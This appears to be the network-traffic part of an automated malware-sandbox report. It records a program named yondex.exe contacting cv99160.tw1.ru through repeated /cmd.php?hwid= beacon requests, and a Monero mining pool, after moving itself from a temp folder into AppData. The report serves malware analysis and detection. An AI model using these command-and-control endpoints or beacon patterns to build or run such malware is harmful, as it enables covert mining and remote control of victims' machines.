                                                                              Jun 23, 2024 11:34:46.859472990 CEST49880443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:46.859507084 CEST4434988092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:47.558887959 CEST4434988092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:47.560291052 CEST49880443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:47.560316086 CEST4434988092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:47.911736012 CEST4434988092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:47.911909103 CEST4434988092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:47.912096024 CEST49880443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:47.912234068 CEST49880443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:47.930852890 CEST333349843141.94.96.71192.168.2.4
                                                                              Jun 23, 2024 11:34:47.984955072 CEST498433333192.168.2.4141.94.96.71
                                                                              Jun 23, 2024 11:34:49.072174072 CEST49881443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:49.072283030 CEST4434988192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:49.072423935 CEST49881443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:49.072633028 CEST49881443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:49.072655916 CEST4434988192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:49.778609037 CEST4434988192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:49.780209064 CEST49881443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:49.780309916 CEST4434988192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:50.121787071 CEST4434988192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:50.121932030 CEST4434988192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:50.122013092 CEST49881443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:50.122226000 CEST49881443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:50.123142004 CEST49882443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:50.123193979 CEST4434988292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:50.123276949 CEST49882443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:50.123508930 CEST49882443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:50.123536110 CEST4434988292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:50.826663971 CEST4434988292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:50.828069925 CEST49882443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:50.828156948 CEST4434988292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:51.167448997 CEST4434988292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:51.167762995 CEST4434988292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:51.167829990 CEST49882443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:51.168036938 CEST49882443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:52.251276016 CEST49883443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:52.251317978 CEST4434988392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:52.251394987 CEST49883443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:52.251610041 CEST49883443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:52.251627922 CEST4434988392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:52.422719955 CEST333349843141.94.96.71192.168.2.4
                                                                              Jun 23, 2024 11:34:52.594218016 CEST498433333192.168.2.4141.94.96.71
                                                                              Jun 23, 2024 11:34:52.957226038 CEST4434988392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:52.959341049 CEST49883443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:52.959424973 CEST4434988392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:53.300592899 CEST4434988392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:53.300745010 CEST4434988392.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:53.300832987 CEST49883443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:53.301131964 CEST49883443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:53.301944971 CEST49884443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:53.301995039 CEST4434988492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:53.302074909 CEST49884443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:53.302273989 CEST49884443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:53.302289009 CEST4434988492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:53.998790026 CEST4434988492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:54.000314951 CEST49884443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:54.000358105 CEST4434988492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:54.340581894 CEST4434988492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:54.340749979 CEST4434988492.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:54.340814114 CEST49884443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:54.341059923 CEST49884443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:55.552200079 CEST49885443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:55.552289009 CEST4434988592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:55.552360058 CEST49885443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:55.552588940 CEST49885443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:55.552624941 CEST4434988592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:56.341789007 CEST4434988592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:56.343276024 CEST49885443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:56.343338013 CEST4434988592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:56.682631016 CEST4434988592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:56.682894945 CEST4434988592.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:56.682960033 CEST49885443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:56.683053970 CEST49885443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:56.683887005 CEST49886443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:56.683942080 CEST4434988692.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:56.684020996 CEST49886443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:56.684233904 CEST49886443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:56.684266090 CEST4434988692.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:57.478069067 CEST4434988692.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:57.479537964 CEST49886443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:57.479598045 CEST4434988692.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:57.825534105 CEST4434988692.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:57.825728893 CEST4434988692.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:57.825808048 CEST49886443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:57.826025963 CEST49886443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:59.017365932 CEST49887443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:59.017461061 CEST4434988792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:59.017616034 CEST49887443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:59.017822027 CEST49887443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:59.017857075 CEST4434988792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:59.728012085 CEST4434988792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:34:59.729469061 CEST49887443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:34:59.729526043 CEST4434988792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:00.072411060 CEST4434988792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:00.072619915 CEST4434988792.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:00.072690964 CEST49887443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:00.072839022 CEST49887443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:00.073687077 CEST49888443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:00.073740959 CEST4434988892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:00.073818922 CEST49888443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:00.074038029 CEST49888443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:00.074069023 CEST4434988892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:00.785201073 CEST4434988892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:00.786756992 CEST49888443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:00.786842108 CEST4434988892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:01.126866102 CEST4434988892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:01.127049923 CEST4434988892.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:01.127126932 CEST49888443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:01.127403975 CEST49888443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:02.557676077 CEST49889443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:02.557776928 CEST4434988992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:02.557861090 CEST49889443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:02.558094025 CEST49889443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:02.558132887 CEST4434988992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:03.277863979 CEST4434988992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:03.279544115 CEST49889443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:03.279596090 CEST4434988992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:03.626966000 CEST4434988992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:03.627115011 CEST4434988992.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:03.627207041 CEST49889443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:03.627398014 CEST49889443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:03.628283024 CEST49890443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:03.628355026 CEST4434989092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:03.628437042 CEST49890443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:03.628681898 CEST49890443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:03.628726959 CEST4434989092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:04.352106094 CEST4434989092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:04.353596926 CEST49890443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:04.353646994 CEST4434989092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:04.698201895 CEST4434989092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:04.698367119 CEST4434989092.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:04.698597908 CEST49890443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:04.698709011 CEST49890443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:06.968867064 CEST49891443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:06.968960047 CEST4434989192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:06.969042063 CEST49891443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:06.969398975 CEST49891443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:06.969434977 CEST4434989192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:07.694642067 CEST4434989192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:07.696079016 CEST49891443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:07.696161032 CEST4434989192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:08.040169001 CEST4434989192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:08.040322065 CEST4434989192.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:08.040409088 CEST49891443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:08.040549040 CEST49891443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:08.041356087 CEST49892443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:08.041450977 CEST4434989292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:08.041537046 CEST49892443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:08.041807890 CEST49892443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:08.041845083 CEST4434989292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:08.747780085 CEST4434989292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:08.749325991 CEST49892443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:08.749387980 CEST4434989292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:09.091356039 CEST4434989292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:09.091531992 CEST4434989292.53.96.121192.168.2.4
                                                                              Jun 23, 2024 11:35:09.091597080 CEST49892443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:09.091851950 CEST49892443192.168.2.492.53.96.121
                                                                              Jun 23, 2024 11:35:09.429047108 CEST333349843141.94.96.71192.168.2.4
                                                                              Jun 23, 2024 11:35:09.500463009 CEST498433333192.168.2.4141.94.96.71

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jun 23, 2024 11:31:10.780622959 CEST6190653192.168.2.41.1.1.1
                                                                              Jun 23, 2024 11:31:10.830748081 CEST53619061.1.1.1192.168.2.4
                                                                              Jun 23, 2024 11:31:12.198589087 CEST4969853192.168.2.41.1.1.1
                                                                              Jun 23, 2024 11:31:12.209815979 CEST53496981.1.1.1192.168.2.4

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Jun 23, 2024 11:31:10.780622959 CEST192.168.2.41.1.1.10x802eStandard query (0)cv99160.tw1.ruA (IP address)IN (0x0001)false
                                                                              Jun 23, 2024 11:31:12.198589087 CEST192.168.2.41.1.1.10x5123Standard query (0)pool.supportxmr.comA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Jun 23, 2024 11:31:10.830748081 CEST1.1.1.1192.168.2.40x802eNo error (0)cv99160.tw1.ru92.53.96.121A (IP address)IN (0x0001)false
                                                                              Jun 23, 2024 11:31:12.209815979 CEST1.1.1.1192.168.2.40x5123No error (0)pool.supportxmr.compool-fr.supportxmr.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jun 23, 2024 11:31:12.209815979 CEST1.1.1.1192.168.2.40x5123No error (0)pool-fr.supportxmr.com141.94.96.144A (IP address)IN (0x0001)false
                                                                              Jun 23, 2024 11:31:12.209815979 CEST1.1.1.1192.168.2.40x5123No error (0)pool-fr.supportxmr.com141.94.96.195A (IP address)IN (0x0001)false
                                                                              Jun 23, 2024 11:31:12.209815979 CEST1.1.1.1192.168.2.40x5123No error (0)pool-fr.supportxmr.com141.94.96.71A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • cv99160.tw1.ru

                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.44973192.53.96.1214436936C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:11 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:31:12 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:12 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=9972c2334554062f25a153e736384962; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.44973392.53.96.1214436936C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:13 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:31:13 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:13 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=5dfd13a2fbd8200ac0b97f259e04310b; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:31:13 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.44973492.53.96.1214436936C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:14 UTC148OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:31:14 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:14 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=fde6ef62d90f48fdf15ee313d769bdd0; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.44973592.53.96.1214436936C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:15 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:31:15 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:15 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=abddcc20d6662c2ece556dc338a4b9f3; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:31:15 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.44973792.53.96.1214437568C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:21 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:31:21 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:21 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=87434c3954741ad76adc40e29ba1d45e; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.44973892.53.96.1214437568C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:22 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:31:22 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:22 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=d33c6c0872914df4e0491810bbee114d; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:31:22 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.44973992.53.96.1214437568C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:23 UTC148OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:31:23 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:23 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=de602d527296c699148e20cb557fb82f; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.44974192.53.96.1214437568C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:24 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:31:25 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:24 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=1c19c175874b76d1a6a52b596cdd9278; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:31:25 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.44974292.53.96.1214437568C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:25 UTC148OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:31:26 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:26 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=778cf168785064e553e1193d53a50070; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.44974492.53.96.1214437568C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:27 UTC168OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:31:27 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:27 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=e6158b8c5b10ecae63292e9c54b7694d; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:31:27 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              10192.168.2.44974992.53.96.1214437864C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:33 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:31:33 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:33 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=cb6c50cb5830cd0f5d9513dc1500b7e8; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              11192.168.2.44975092.53.96.1214437864C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:34 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:31:34 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:31:34 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=bb8981b999369c0639d06b6e13a823e4; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:31:34 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              12192.168.2.44975192.53.96.1214437864C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:31:35 UTC148OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
